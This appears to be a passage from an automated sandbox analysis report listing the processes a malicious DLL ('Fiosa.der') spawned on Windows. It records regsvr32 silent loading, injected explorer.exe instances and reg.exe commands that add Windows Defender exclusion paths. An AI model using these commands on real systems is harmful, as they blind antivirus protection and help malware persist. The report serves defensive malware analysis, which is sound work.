      Analysis Process: regsvr32.exe PID: 2960 Parent PID: 1672

      General

      Start time:16:01:13
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2536 Parent PID: 2960

      General

      Start time:16:01:13
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: explorer.exe PID: 236 Parent PID: 1724

      General

      Start time:16:01:36
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 804 Parent PID: 1180

      General

      Start time:16:01:37
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa2.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 152 Parent PID: 804

      General

      Start time:16:01:38
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa2.der
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 1256 Parent PID: 2536

      General

      Start time:16:01:39
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 2932 Parent PID: 1256

      General

      Start time:16:01:41
      Start date:24/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
      Imagebase:0xff440000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 2788 Parent PID: 1256

      General

      Start time:16:01:42
      Start date:24/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
      Imagebase:0xff930000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 1408 Parent PID: 152

      General

      Start time:16:02:02
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2320 Parent PID: 1672

      General

      Start time:16:03:00
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff850000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2940 Parent PID: 2320

      General

      Start time:16:03:00
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x660000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis

      Reset < >